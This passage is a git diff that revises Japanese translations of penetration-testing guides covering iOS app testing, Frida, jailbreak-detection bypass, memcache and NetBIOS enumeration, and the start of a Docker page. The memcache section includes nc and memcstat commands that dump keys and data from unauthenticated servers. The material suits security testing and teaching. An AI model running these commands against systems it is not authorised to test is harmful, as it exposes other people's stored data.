-開発者は、アプリケーションをApp Storeに再提出して承認を待つことなく、**アプリのすべてのインストールを即座にパッチ**できます。\
-この目的のために通常は[**JSPatch**](https://github.com/bang590/JSPatch)**が使用されます。**しかし、[Siren](https://github.com/ArtSabintsev/Siren)や[react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker)などの他のオプションもあります。\
-**これは悪意のあるサードパーティSDKによって悪用される可能性のある危険なメカニズムであるため、自動更新に使用される方法(もしあれば)を確認し、テストすることをお勧めします。**この目的のためにアプリの以前のバージョンをダウンロードしてみることができます。
+開発者は、アプリケーションをApp Storeに再提出して承認を待つことなく、**アプリのすべてのインストールを瞬時にパッチ**できます。\
+この目的のために通常は[**JSPatch**](https://github.com/bang590/JSPatch)**が使用されます。** しかし、[Siren](https://github.com/ArtSabintsev/Siren)や[react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker)などの他のオプションもあります。\
+**これは悪意のあるサードパーティSDKによって悪用される可能性のある危険なメカニズムであるため、自動更新に使用される方法(もしあれば)を確認し、テストすることをお勧めします。** この目的のためにアプリの以前のバージョンをダウンロードしてみることができます。
 
 ### サードパーティ
 
-**3rdパーティSDK**に関する重要な課題は、その機能に対する**詳細な制御の欠如**です。開発者は、SDKを統合してそのすべての機能を受け入れるか、潜在的なセキュリティ脆弱性やプライバシーの懸念を含めて、またはその利点を完全に放棄するかの選択を迫られます。多くの場合、開発者はこれらのSDK内の脆弱性を自分でパッチすることができません。さらに、SDKがコミュニティ内で信頼を得るにつれて、一部はマルウェアを含むようになる可能性があります。
+**3rdパーティSDK**に関する重要な課題は、その機能に対する**詳細な制御の欠如**です。開発者は、SDKを統合してそのすべての機能を受け入れるか、潜在的なセキュリティ脆弱性やプライバシーの懸念を含めて、完全にその利点を放棄するかの選択を迫られます。多くの場合、開発者はこれらのSDK内の脆弱性を自分でパッチすることができません。さらに、SDKがコミュニティ内で信頼を得るにつれて、一部はマルウェアを含む可能性があります。
 
-サードパーティSDKが提供するサービスには、ユーザー行動の追跡、広告の表示、またはユーザーエクスペリエンスの向上が含まれる場合があります。しかし、これにより、開発者がこれらのライブラリによって実行されるコードを完全に把握していない可能性があるため、プライバシーやセキュリティのリスクが生じます。サードパーティサービスと共有する情報は必要なものに制限し、機密データが露出しないようにすることが重要です。
+サードパーティSDKが提供するサービスには、ユーザー行動の追跡、広告の表示、またはユーザーエクスペリエンスの向上が含まれる場合があります。しかし、これにより、開発者はこれらのライブラリによって実行されるコードを完全に把握していない可能性があり、プライバシーやセキュリティのリスクが生じる可能性があります。サードパーティサービスと共有する情報は必要なものに制限し、機密データが露出しないようにすることが重要です。
 
 サードパーティサービスの実装は通常、スタンドアロンライブラリまたは完全なSDKの2つの形式で行われます。ユーザーのプライバシーを保護するために、これらのサービスと共有されるデータは、個人を特定できる情報(PII)の開示を防ぐために**匿名化**されるべきです。
 
-アプリケーションが使用しているライブラリを特定するために、**`otool`**コマンドを使用できます。このツールは、アプリケーションとそれが使用する各共有ライブラリに対して実行され、追加のライブラリを発見します。
+アプリケーションが使用するライブラリを特定するために、**`otool`** コマンドを使用できます。このツールは、アプリケーションとそれが使用する各共有ライブラリに対して実行され、追加のライブラリを発見するために使用されます。
 ```bash
 otool -L 
 ```
diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
index 536062e48..075750b92 100644
--- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
+++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
@@ -2,24 +2,25 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
 ## Installing Frida
 
-**JailbrokenデバイスにFridaをインストールする手順:**
+**脱獄デバイスにFridaをインストールする手順:**
 
 1. Cydia/Sileoアプリを開く。
-2. Manage -> Sources -> Edit -> Addに移動する。
+2. 管理 -> ソース -> 編集 -> 追加に移動する。
 3. URLとして「https://build.frida.re」を入力する。
 4. 新しく追加したFridaソースに移動する。
 5. Fridaパッケージをインストールする。
 
-**Corellium**を使用している場合は、[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)からFridaリリースをダウンロードする必要があります(`frida-gadget-[yourversion]-ios-universal.dylib.gz`)そして解凍してFridaが要求するdylibの場所にコピーします。例: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
+**Corellium**を使用している場合は、[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)からFridaリリースをダウンロードする必要があります(`frida-gadget-[yourversion]-ios-universal.dylib.gz`)そして、解凍してFridaが要求するdylibの場所にコピーします。例: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
 
-インストール後、PCで**`frida-ls-devices`**コマンドを使用してデバイスが表示されることを確認します(PCがデバイスにアクセスできる必要があります)。\
+インストール後、PCで**`frida-ls-devices`**コマンドを使用してデバイスが表示されるか確認します(PCがデバイスにアクセスできる必要があります)。\
 また、**`frida-ps -Uia`**を実行して電話の実行中のプロセスを確認します。
 
 ## JailbrokenデバイスなしでのFridaおよびアプリのパッチなし
 
-アプリのパッチなしで非jailbrokenデバイスでFridaを使用する方法についてのブログ投稿を確認してください: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
+アプリのパッチなしで非脱獄デバイスでFridaを使用する方法についてのブログ投稿を確認してください: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
 
 ## Frida Client Installation
 
@@ -28,7 +29,7 @@
 pip install frida-tools
 pip install frida
 ```
-Fridaサーバーがインストールされ、デバイスが実行中で接続されている状態で、**クライアントが** **動作しているか** **確認**します:
+Fridaサーバーがインストールされ、デバイスが起動して接続されている状態で、**チェック**してクライアントが**動作している**か確認します:
 ```bash
 frida-ls-devices  # List devices
 frida-ps -Uia     # Get running processes
@@ -177,13 +178,13 @@ Stalker.flush() // this is important to get all events
 })
 ```
 > [!CAUTION]
-> デバッグの目的からは興味深いですが、ファジングにおいては、常に **`.follow()`** と **`.unfollow()`** を使用するのは非常に非効率です。
+> デバッグの目的からは興味深いですが、ファジングにおいては、常に **`.follow()`** と **`.unfollow()`** を行うのは非常に非効率的です。
 
 ## [Fpicker](https://github.com/ttdennis/fpicker)
 
 [**fpicker**](https://github.com/ttdennis/fpicker) は、AFL++ モードやパッシブトレースモードなど、プロセス内ファジングのためのさまざまなファジングモードを提供する **Fridaベースのファジングスイート** です。Frida によってサポートされているすべてのプラットフォームで実行できるはずです。
 
-- [**fpickerをインストール**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
+- [**fpicker をインストール**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
 ```bash
 # Get fpicker
 git clone https://github.com/ttdennis/fpicker
@@ -212,7 +213,7 @@ mkdir -p examples/wg-log/in # For starting inputs
 # Create at least 1 input for the fuzzer
 echo Hello World > examples/wg-log/in/0
 ```
-- **Fuzzerスクリプト** (`examples/wg-log/myfuzzer.js`):
+- **Fuzzer script** (`examples/wg-log/myfuzzer.js`):
 ```javascript:examples/wg-log/myfuzzer.js
 // Import the fuzzer base class
 import { Fuzzer } from "../../harness/fuzzer.js"
@@ -276,7 +277,7 @@ this.target_function(this.wg_log_global_ptr, this.tag, this.payload)
 const f = new WGLogFuzzer()
 rpc.exports.fuzzer = f
 ```
-- **ファズァをコンパイル**する:
+- **ファズァ**をコンパイルする:
 ```bash
 # From inside fpicker clone
 ## Compile from "myfuzzer.js" to "harness.js"
@@ -301,7 +302,7 @@ fpicker -v --fuzzer-mode active -e attach -p  -D usb -o example
 また、**`idevicesyslog`**を使用してiOSのログも確認できます。\
 一部のログは情報を省略し、**``**を追加します。すべての情報を表示するには、[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)からプロファイルをインストールして、そのプライベート情報を有効にする必要があります。
 
-何をすべきかわからない場合:
+何をすべきかわからない場合:
 ```sh
 vim /Library/Preferences/Logging/com.apple.system.logging.plist
 
@@ -325,10 +326,11 @@ killall -9 logd
 - `~/Library/Logs/DiagnosticReports`
 
 > [!WARNING]
-> iOSは同じアプリのクラッシュを25件しか保存しないため、これをクリアする必要があります。さもなければ、iOSはクラッシュの作成を停止します。
+> iOSは同じアプリのクラッシュを25件しか保存しないため、これをクリアしないとiOSはクラッシュの作成を停止します。
 
 ## Frida Android Tutorials
 
+
 {{#ref}}
 ../android-app-pentesting/frida-tutorial/
 {{#endref}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
index b27581f0a..c698c3327 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
@@ -4,9 +4,9 @@
 
 ## Apple Developer Program
 
-**プロビジョニングアイデンティティ**は、Apple開発者アカウントに関連付けられた公開鍵と秘密鍵のコレクションです。**アプリに署名する**には、**99$/年**を支払って**Apple Developer Program**に登録し、プロビジョニングアイデンティティを取得する必要があります。これがないと、物理デバイスでソースコードからアプリケーションを実行することはできません。別の方法としては、**脱獄したデバイス**を使用することです。
+**プロビジョニングアイデンティティ**は、Apple開発者アカウントに関連付けられた公開鍵と秘密鍵のコレクションです。**アプリに署名する**には、**99$/年**を支払って**Apple Developer Program**に登録し、プロビジョニングアイデンティティを取得する必要があります。これがないと、物理デバイスでソースコードからアプリケーションを実行することはできません。これを行う別のオプションは、**脱獄デバイス**を使用することです。
 
-Xcode 7.2以降、Appleは**無料のiOS開発プロビジョニングプロファイル**を作成するオプションを提供しており、これにより実際のiPhoneでアプリケーションを作成およびテストできます。_Xcode_ --> _Preferences_ --> _Accounts_ --> _+_(資格情報に新しいアプリIDを追加)--> _作成したApple IDをクリック_ --> _Manage Certificates_ --> _+_(Apple Development)--> _Done_\
+Xcode 7.2以降、Appleは**無料のiOS開発プロビジョニングプロファイル**を作成するオプションを提供しており、これにより実際のiPhoneでアプリケーションを記述およびテストできます。_Xcode_ --> _Preferences_ --> _Accounts_ --> _+_(資格情報に新しいアプリIDを追加)--> _作成したApple IDをクリック_ --> _Manage Certificates_ --> _+_(Apple Development)--> _Done_\
 \_\_次に、iPhoneでアプリケーションを実行するには、まず**iPhoneにコンピュータを信頼させる必要があります。**その後、Xcodeから**アプリケーションをモバイルで実行しようとしますが、エラーが表示されます。設定に移動して、_Settings_ --> _General_ --> _Profiles and Device Management_ --> 信頼されていないプロファイルを選択し、**「信頼」**をクリックします。
 
 **同じ署名証明書で署名されたアプリケーションは、キーチェーンアイテムのように安全にリソースを共有できます**。
@@ -15,15 +15,15 @@ Xcode 7.2以降、Appleは**無料のiOS開発プロビジョニングプロフ
 
 ## **Simulator**
 
-> [!NOTE]
-> **シミュレーターはエミュレーターとは異なる**ことに注意してください。シミュレーターはデバイスの動作や機能をシミュレートするだけで、実際にはそれらを使用しません。
+> [!TIP]
+> **シミュレーターはエミュレーターとは異なる**ことに注意してください。シミュレーターはデバイスの動作と機能をシミュレートするだけで、実際にはそれらを使用しません。
 
 ### **Simulator**
 
-最初に知っておくべきことは、**シミュレーター内でのペンテストは、脱獄したデバイスで行うよりもはるかに制限される**ということです。
+最初に知っておくべきことは、**シミュレーター内でのペンテストは、脱獄デバイスで行うよりもはるかに制限される**ということです。
 
 iOSアプリを構築およびサポートするために必要なすべてのツールは、**Mac OSでのみ公式にサポートされています**。\
-Appleの事実上のツールは、iOSアプリケーションを作成/デバッグ/インスツルメントするための**Xcode**です。これを使用して、**シミュレーター**やアプリを構築および**テスト**するために必要なさまざまな**SDK** **バージョン**をダウンロードできます。\
+Appleの事実上のツールは、iOSアプリケーションを作成/デバッグ/計測するための**Xcode**です。これを使用して、アプリを構築および**テスト**するために必要な**シミュレーター**やさまざまな**SDK** **バージョン**をダウンロードできます。\
 **公式アプリストア**からXcodeを**ダウンロード**することを強くお勧めします。他のバージョンにはマルウェアが含まれている可能性があります。
 
 シミュレーターのファイルは`/Users//Library/Developer/CoreSimulator/Devices`にあります。
@@ -37,16 +37,16 @@ Appleの事実上のツールは、iOSアプリケーションを作成/デバ
 
 ### Applications in the Simulator
 
-`/Users//Library/Developer/CoreSimulator/Devices`内には、すべての**インストールされたシミュレーター**が見つかります。エミュレーターの1つ内で作成されたアプリケーションのファイルにアクセスしたい場合、**どのエミュレーターにアプリがインストールされているかを知るのは難しい**かもしれません。**正しいUIDを見つける**ための簡単な方法は、シミュレーターでアプリを実行し、次のコマンドを実行することです:
+`/Users//Library/Developer/CoreSimulator/Devices`内には、すべての**インストールされたシミュレーター**が見つかります。エミュレーターの1つ内で作成されたアプリケーションのファイルにアクセスしたい場合、**どのエミュレーターにアプリがインストールされているかを知るのが難しい**ことがあります。**正しいUIDを見つける**ための簡単な方法は、シミュレーターでアプリを実行し、次のコマンドを実行することです:
 ```bash
 xcrun simctl list | grep Booted
 iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted)
 ```
-UIDがわかれば、その中にインストールされているアプリは`/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application`で見つけることができます。
+一度UIDがわかれば、その中にインストールされているアプリは`/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application`で見つけることができます。
 
 しかし、驚くべきことに、ここではアプリケーションを見つけることはできません。`/Users//Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`にアクセスする必要があります。
 
-このフォルダ内で**アプリケーションのパッケージを見つけることができます。**
+そして、このフォルダーで**アプリケーションのパッケージを見つけることができます。**
 
 ## エミュレーター
 
@@ -54,7 +54,7 @@ Corelliumは唯一の公開されているiOSエミュレーターです。こ
 
 ## ジェイルブレイク不要
 
-**非ジェイルブレイクデバイス**でiOSアプリケーションをペンテストする方法についてのブログ記事をチェックしてください:
+**非ジェイルブレイクデバイス**でiOSアプリケーションをペンテストする方法についてのブログ投稿をチェックしてください:
 
 {{#ref}}
 ios-pentesting-without-jailbreak.md
@@ -62,14 +62,14 @@ ios-pentesting-without-jailbreak.md
 
 ## ジェイルブレイキング
 
-Appleは、iPhone上で実行されるコードが**Appleによって発行された証明書で署名されている必要がある**と厳格に要求しています。**ジェイルブレイキング**は、そのような制限やOSによって設けられた他のセキュリティコントロールを**回避する**プロセスです。したがって、デバイスがジェイルブレイクされると、アプリがインストールされているかどうかを確認する**整合性チェック**がパッチされ、**バイパスされます**。
+Appleは、iPhone上で実行されるコードが**Appleによって発行された証明書で署名されている必要がある**と厳格に要求しています。**ジェイルブレイキング**は、そのような制限やOSによって設けられた他のセキュリティコントロールを**回避する**プロセスです。したがって、デバイスがジェイルブレイクされると、アプリがインストールされているかを確認する**整合性チェック**がパッチされ、**バイパスされます**。
 
-> [!NOTE]
+> [!TIP]
 > Androidとは異なり、iOSではデバイス上で未署名/信頼されていないコードを実行するために「開発者モード」に切り替えることはできません。
 
 ### Androidのルート化とiOSのジェイルブレイキング
 
-しばしば比較されますが、Androidの**ルート化**とiOSの**ジェイルブレイキング**は根本的に異なるプロセスです。Androidデバイスのルート化には、**`su`バイナリのインストール**や**ルート化されたカスタムROMでシステムを置き換える**ことが含まれる場合がありますが、ブートローダーがアンロックされていれば必ずしもエクスプロイトは必要ありません。**カスタムROMのフラッシング**は、ブートローダーをアンロックした後にデバイスのOSを置き換え、時にはエクスプロイトが必要です。
+しばしば比較されますが、Androidの**ルート化**とiOSの**ジェイルブレイキング**は根本的に異なるプロセスです。Androidデバイスのルート化は、**`su`バイナリをインストールする**か、**ルート化されたカスタムROMでシステムを置き換える**ことを含む場合があり、ブートローダーがアンロックされていれば必ずしもエクスプロイトを必要としません。**カスタムROMのフラッシング**は、ブートローダーをアンロックした後にデバイスのOSを置き換え、時にはエクスプロイトを必要とします。
 
 対照的に、iOSデバイスはブートローダーがApple署名のイメージのみをブートする制限のため、カスタムROMをフラッシュすることができません。**iOSのジェイルブレイキング**は、未署名のコードを実行するためにAppleのコード署名保護を回避することを目的としており、Appleの継続的なセキュリティ強化によって複雑化しています。
 
@@ -108,15 +108,15 @@ basic-ios-testing-operations.md
 
 ### **ジェイルブレイク検出**
 
-**いくつかのアプリケーションは、モバイルがジェイルブレイクされているかどうかを検出し、その場合アプリケーションは実行されません**
+**いくつかのアプリケーションは、モバイルがジェイルブレイクされているかどうかを検出し、その場合アプリケーションは実行されません。**
 
-- ジェイルブレイク後、iOSでは**ファイルとフォルダが通常インストールされます**。これらを検索してデバイスがジェイルブレイクされているかどうかを判断できます。
-- ジェイルブレイクされたデバイスでは、アプリケーションが**サンドボックス外の新しいファイルに対して読み書きアクセスを得ます**
-- 一部の**API** **呼び出し**は**異なる動作をします**
+- ジェイルブレイク後、iOSでは**ファイルとフォルダーが通常インストールされ**、これらを検索してデバイスがジェイルブレイクされているかを判断できます。
+- ジェイルブレイクされたデバイスでは、アプリケーションがサンドボックスの外の新しいファイルに**読み書きアクセス**を得ます。
+- 一部の**API** **呼び出し**は**異なる動作**をします。
 - **OpenSSH**サービスの存在
-- `/bin/sh`を呼び出すと**0ではなく1を返します**
+- `/bin/sh`を呼び出すと**1**が返され、0ではありません。
 
-**ジェイルブレイキングを検出する方法についての詳細情報**は[**こちら**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**。**
+**ジェイルブレイキングを検出する方法についての詳細情報は**[**こちら**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**。**
 
 この検出を回避するために、**objectionの**`ios jailbreak disable`を使用することができます。
 
diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md
index ef3d3f8f1..3262846e8 100644
--- a/src/network-services-pentesting/11211-memcache/README.md
+++ b/src/network-services-pentesting/11211-memcache/README.md
@@ -4,9 +4,9 @@
 
 ## プロトコル情報
 
-[ウィキペディア](https://en.wikipedia.org/wiki/Memcached)から:
+From [wikipedia](https://en.wikipedia.org/wiki/Memcached):
 
-> **Memcached**(発音: mem-cashed, mem-cash-dee)は、一般的な分散型の[メモリキャッシング](https://en.wikipedia.org/wiki/Memory_caching)システムです。データとオブジェクトをRAMにキャッシュすることで、外部データソース(データベースやAPIなど)を読み取る回数を減らし、動的なデータベース駆動のウェブサイトの速度を向上させるためにしばしば使用されます。
+> **Memcached** (発音: mem-cashed, mem-cash-dee) は、一般的な分散型 [メモリキャッシング](https://en.wikipedia.org/wiki/Memory_caching) システムです。データとオブジェクトをRAMにキャッシュすることで、外部データソース(データベースやAPIなど)を読み取る回数を減らし、動的なデータベース駆動のウェブサイトの速度を向上させるためにしばしば使用されます。
 
 MemcachedはSASLをサポートしていますが、ほとんどのインスタンスは**認証なしで公開されています**。
 
@@ -23,7 +23,7 @@ memcache インスタンス内に保存されているすべての情報を抽
 
 1. **アクティブアイテム**のある **スラブ** を見つける
 2. 前に検出したスラブの **キー名** を取得する
-3. **キー名** を取得することで **保存されたデータ** を抽出する
+3. **キー名** を取得して **保存されたデータ** を抽出する
 
 このサービスは単なる **キャッシュ** であるため、**データが現れたり消えたりする** 可能性があることを忘れないでください。
 ```bash
@@ -38,7 +38,7 @@ echo "get " | nc -vn -w 1  11211  #Get saved info
 sudo apt-get install php-memcached
 php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'
 ```
-### マニュアル2
+### Manual2
 ```bash
 sudo apt install libmemcached-tools
 memcstat --servers=127.0.0.1 #Get stats
@@ -53,17 +53,17 @@ msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplifica
 ```
 ## **Memcacheキーのダンプ**
 
-memcacheの領域では、データをスラブによって整理するのを助けるプロトコルであり、保存されたデータを検査するための特定のコマンドが存在しますが、顕著な制約があります:
+memcacheの領域では、データをスラブによって整理するプロトコルであり、保存されたデータを検査するための特定のコマンドが存在しますが、顕著な制約があります:
 
-1. キーはスラブクラスごとにのみダンプでき、同様のコンテンツサイズのキーをグループ化します。
+1. キーはスラブクラスごとにのみダンプでき、同様のコンテンツサイズのキーがグループ化されます。
 2. スラブクラスごとに1ページの制限があり、これは1MBのデータに相当します。
-3. この機能は公式ではなく、いつでも中止される可能性があるため、[コミュニティフォーラム](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM)で議論されています。
+3. この機能は公式ではなく、いつでも廃止される可能性があるため、[コミュニティフォーラム](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM)で議論されています。
 
 数ギガバイトのデータから1MBしかダンプできないという制限は特に重要です。しかし、この機能は特定のニーズに応じてキーの使用パターンに関する洞察を提供することができます。メカニクスにあまり興味がない方は、[ツールセクション](https://lzone.de/cheat-sheet/memcached#tools)を訪れると、包括的なダンプのためのユーティリティが見つかります。あるいは、memcachedセットアップとの直接的な対話のためにtelnetを使用するプロセスは以下に示されています。
 
 ### **動作の仕組み**
 
-Memcacheのメモリ構成は重要です。"-vv"オプションでmemcacheを起動すると、生成されるスラブクラスが表示されます。
+Memcacheのメモリの組織は重要です。"-vv"オプションでmemcacheを起動すると、生成されるスラブクラスが表示されます。
 ```bash
 $ memcached -vv
 slab class   1: chunk size        96 perslab   10922
@@ -79,19 +79,19 @@ set mykey 0 60 1
 1
 STORED
 ```
-"stats slabs" コマンドをキー追加後に実行すると、スラブの利用状況に関する詳細な統計が得られます:
+"stats slabs" コマンドをキー追加後に実行すると、スラブ利用に関する詳細な統計が得られます:
 ```bash
 stats slabs
 [...]
 ```
-この出力は、アクティブなスラブタイプ、使用されているチャンク、および運用統計を明らかにし、読み取りおよび書き込み操作の効率に関する洞察を提供します。
+この出力は、アクティブなスラブタイプ、使用されているチャンク、および運用統計を示し、読み取りおよび書き込み操作の効率に関する洞察を提供します。
 
 もう一つの便利なコマンド「stats items」は、追い出し、メモリ制約、およびアイテムのライフサイクルに関するデータを提供します:
 ```bash
 stats items
 [...]
 ```
-これらの統計は、異なるコンテンツサイズに対するキャッシュ効率、メモリ割り当て、大きなオブジェクトのキャッシュ能力を含むアプリケーションキャッシングの動作についての教育的な仮定を可能にします。
+これらの統計は、アプリケーションのキャッシング動作についての教育的な仮定を可能にし、異なるコンテンツサイズに対するキャッシュ効率、メモリ割り当て、大きなオブジェクトをキャッシュするための容量を含みます。
 
 ### **キーのダンプ**
 
@@ -99,17 +99,17 @@ stats items
 ```bash
 stats cachedump  
 ```
-クラス #1 でキーをダンプするには、例えば:
+例えば、クラス #1 でキーをダンプするには:
 ```bash
 stats cachedump 1 1000
 ITEM mykey [1 b; 1350677968 s]
 END
 ```
-この方法はスラブクラスを反復処理し、キーの値を抽出し、オプションでダンプします。
+このメソッドはスラブクラスを反復処理し、キーの値を抽出し、オプションでダンプします。
 
 ### **MEMCACHE キーのダンプ (VER 1.4.31+)**
 
-memcache バージョン 1.4.31 以上では、[リリースノート](https://github.com/memcached/memcached/wiki/ReleaseNotes1431)に詳述されている非ブロッキングモードを利用した、プロダクション環境でのキーをダンプするための新しい安全な方法が導入されました。このアプローチは広範な出力を生成するため、効率のために 'nc' コマンドを使用することを推奨します。例としては次のようなものがあります:
+memcache バージョン 1.4.31 以上では、プロダクション環境でのキーをダンプするための新しく、安全な方法が導入されており、[リリースノート](https://github.com/memcached/memcached/wiki/ReleaseNotes1431)に詳述されている非ブロッキングモードを利用しています。このアプローチは広範な出力を生成するため、効率のために 'nc' コマンドを使用することを推奨します。例としては:
 ```bash
 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1
 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28
@@ -125,7 +125,7 @@ Table [from here](https://lzone.de/blog).
 | Ruby                  | [simple script](https://gist.github.com/1365005)                                                                                  | キー名を表示します。                                                                                                                                                      |                                                                            |         |
 | Perl                  | [memdump](https://search.cpan.org/~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod)                         | CPANモジュールのツール                                                                                                                                                    | [Memcached-libmemcached](https://search.cpan.org/~dmaki/Memcached-libmemc) | ached/) |
 | PHP                   | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/)                                         | キーのダンプも可能なMemcacheモニタリングGUI                                                                                                                  |                                                                            |         |
-| libmemcached          | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/)                                                             | **memcachedプロセスをフリーズさせます!!!** 本番環境で使用する際は注意してください。それでも使用することで1MBの制限を回避し、**すべての**キーをダンプできます。 |                                                                            |         |
+| libmemcached          | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/)                                                             | **メモリキャッシュプロセスがフリーズします!!!** 本番環境で使用する際は注意してください。それでも使用することで1MBの制限を回避し、**すべての**キーをダンプできます。 |                                                                            |         |
 
 ## トラブルシューティング 
 
@@ -135,7 +135,7 @@ memcached 1.4以前では、デフォルトの最大スラブサイズのため
 
 ### タイムアウトを30日以上に設定しないでください! 
 
-許可された最大値を超えるタイムアウトでキーを「設定」または「追加」しようとすると、memcachedはその値をUnixタイムスタンプとして扱うため、期待通りの結果が得られない場合があります。また、タイムスタンプが過去の場合、何も行われません。コマンドは静かに失敗します。
+許可されている最大値より大きなタイムアウトでキーを「設定」または「追加」しようとすると、memcachedはその値をUnixタイムスタンプとして扱うため、期待通りの結果が得られない場合があります。また、タイムスタンプが過去の場合、何も行われません。コマンドは静かに失敗します。
 
 したがって、最大の寿命を使用したい場合は、2592000を指定してください。例:
 ```
@@ -144,7 +144,7 @@ set my_key 0 2592000 1
 ```
 ### オーバーフロー時の消失キー 
 
-ドキュメントには、64ビットのオーバーフロー値を「incr」を使用してラップすると値が消えると記載されています。再度「add」/「set」を使用して作成する必要があります。
+ドキュメントには、64ビットのオーバーフローを「incr」を使用して行うと値が消えると記載されていますが、再度「add」/「set」を使用して作成する必要があります。
 
 ### レプリケーション 
 
@@ -152,11 +152,12 @@ memcached自体はレプリケーションをサポートしていません。
 
 - [repcached](http://repcached.lab.klab.org/): マルチマスター非同期レプリケーション(memcached 1.2パッチセット)
 - [Couchbase memcachedインターフェース](http://www.couchbase.com/memcached): CouchBaseをmemcachedのドロップインとして使用
-- [yrmcds](https://cybozu.github.io/yrmcds/): memcached互換のマスター-スレーブキー値ストア
+- [yrmcds](https://cybozu.github.io/yrmcds/): memcached互換のマスター・スレーブキー値ストア
 - [twemproxy](https://github.com/twitter/twemproxy) (別名nutcracker): memcachedサポートのプロキシ
 
 ### コマンドチートシート
 
+
 {{#ref}}
 memcache-commands.md
 {{#endref}}
diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md
index ec93b1f1f..cd7b5dd58 100644
--- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md
+++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md
@@ -8,13 +8,13 @@
 
 [From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):
 
-- 名前の登録と解決のための名前サービス(ポート: 137/udp および 137/tcp)。
-- 接続のない通信のためのデータグラム配信サービス(ポート: 138/udp)。
-- 接続指向通信のためのセッションサービス(ポート: 139/tcp)。
+- 名前の登録と解決のための名前サービス (ポート: 137/udp および 137/tcp)。
+- 接続のない通信のためのデータグラム配信サービス (ポート: 138/udp)。
+- 接続指向通信のためのセッションサービス (ポート: 139/tcp)。
 
 ### Name Service
 
-デバイスが NetBIOS ネットワークに参加するためには、ユニークな名前を持っている必要があります。これは、"Name Query" パケットが送信される **ブロードキャストプロセス** を通じて達成されます。異議がなければ、その名前は利用可能と見なされます。あるいは、**Name Service server** に直接問い合わせて名前の利用可能性を確認したり、名前を IP アドレスに解決したりすることができます。`nmblookup`、`nbtscan`、および `nmap` などのツールが NetBIOS サービスを列挙するために利用され、サーバー名や MAC アドレスを明らかにします。
+デバイスが NetBIOS ネットワークに参加するためには、ユニークな名前を持っている必要があります。これは、"Name Query" パケットが送信される **ブロードキャストプロセス** を通じて達成されます。異議がなければ、その名前は利用可能と見なされます。あるいは、**Name Service サーバー** に直接問い合わせて名前の利用可能性を確認したり、名前を IP アドレスに解決したりすることができます。`nmblookup`、`nbtscan`、および `nmap` などのツールが NetBIOS サービスを列挙するために利用され、サーバー名や MAC アドレスを明らかにします。
 ```bash
 PORT    STATE SERVICE    VERSION
 137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
@@ -45,6 +45,7 @@ PORT      STATE SERVICE      VERSION
 ```
 **次のページを読んで、このサービスを列挙する方法を学んでください:**
 
+
 {{#ref}}
 137-138-139-pentesting-netbios.md
 {{#endref}}
diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md
index 532c1ff6e..d09605f4a 100644
--- a/src/network-services-pentesting/2375-pentesting-docker.md
+++ b/src/network-services-pentesting/2375-pentesting-docker.md
@@ -10,10 +10,10 @@ Dockerは**コンテナ化業界**の**最前線プラットフォーム**であ
 
 #### 基本的なDockerアーキテクチャ
 
-- [**containerd**](http://containerd.io): これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**です。これには、**イメージの転送とストレージ**の管理に加え、コンテナの**実行、監視、ネットワーキング**を監督することが含まれます。**containerdに関する詳細な洞察**は**さらに探求されます**。
